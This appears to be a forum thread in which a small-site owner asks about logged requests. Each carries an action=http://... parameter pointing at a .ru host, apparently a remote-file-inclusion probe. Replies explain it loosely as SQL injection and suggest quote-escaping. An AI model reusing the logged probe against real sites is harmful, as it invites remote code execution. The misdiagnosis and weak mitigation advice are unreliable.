Suspicious 403 errors

spooner_j

Hello all,

I run a few small websites part time, and recently Ive been receiving a lot of 403 errors for some pages on my sites. I'm not sure exactly what to do with them, or if theres any need to worry about them, but having read so much recently about websites being hijacked and malicious code placed on them I thought I'd ask the experts what they thought!

An example of the errors Im receiving are:

Time of the error:  January 15 07:00pm
 
browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
 
Page Requested: www.jamesgcoughlan.com/res_prop.php?action=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head?
 
Referer: 
 
IP Address: 99.228.146.12
 
Hostname: CPE0013461d9ac5-CM0019474d788a.cpe.net.cable.rogers.com

The action=http://... is always some strange long address with a .ru domain, while the IP address seems to constantly change. Im getting a few of these per day, and Im not sure what I should do (if anything). So far I havent noticed any code changes or new iframes popping up on the site, but I'd appreciate any advice that anyone might have.

Thanks!

Martyr

well..it looks like a malicious program of sorts.
possibly looking for web proxies, analysing the return codes. (OR bad PHP programming, in the way it parses the arguements)

i wonder what would happen if returning 200 code - just to see how it would react..but that might invite a whole lot of unwanted trouble too.

spooner_j

So is it safe to just ignore it? Or is there anything else I need to do?

Martyr

its probably looking to exploit a version of phpBB - unless you have it installed, maybe ok to ignore.
but.. wouldn't be bad idea to install mod security

CptSternn

First, thats a 404 - not a 403. A 403 is a denied directory listing.

Anyway, what your seeing there is a bot (an automated script) that is hitting your site looking for bad code which it can use to exploit in a SQL injection attack.

Thanks to Google, you can search for filenames these days like:

post_add.php

email_add.asp

...and others that are default filenames for many popular packages as well as popular filenames for even custom built sites. The script is looking for a page that uses the querystring request type to pass information, then passes a string that will somehow alter the form on the other end.

Most people don't realise that their database back-end is very susceptible to these sort of attacks.

For example:

Lets say you have a site with multiple articles posted and the user can select an article and view it. The page name is:

article.asp

When the user clicks it, it sends the following to the form:

article.asp?id=1

If the code on the other end is open and doesn't check the query string for control codes a hacker than then inject their own statement in like so:

article.asp?id=1 or if 1 = 1 then change password for admin to 1234

Now, thats not an exact example, the spaces would be replaced with ASCII code and of course thats by no means the real SQL commands you would use to change the server admin password, I just used that as an example.

So on the form end the code which would look something like this:

SELECT * FROM TABLENAME WHERE ID = querystring.variable OR IF 1=1 Then *do whatever the hacker wants the server to do*

It's quite common these days. I host a few dozen sites on my servers and get a dozen or so of these A DAY. Most of them come from China. There is nothing you can do to stop it, not that it matters because if your code is good they won't cause any problems.

Just make sure you do not have any SQL statements that include variables that are not checked (i.e. make sure to replace any quotes ' in the statement to keep hackers from passing injection attacks and also set the variable type so they can't pass a string in a variable that is supposed to be a numeral.

I hope that makes sense - I tried to explain it in a language-less format that any programmer can understand.